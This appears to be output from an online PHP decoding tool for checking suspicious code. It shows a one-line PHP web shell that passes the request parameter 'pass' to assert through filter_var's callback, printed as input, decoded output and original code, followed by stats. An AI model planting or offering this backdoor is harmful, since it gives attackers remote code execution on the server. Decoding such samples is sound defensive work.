Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert')); ?>..
Decoded Output download
<?php
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
?>
Did this file decode correctly?
Original Code
<?php
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
?>
Function Calls
| None |
Stats
| MD5 | f7027812ea0fa2ffd73f093e3467ae76 |
| Eval Count | 0 |
| Decode Time | 97 ms |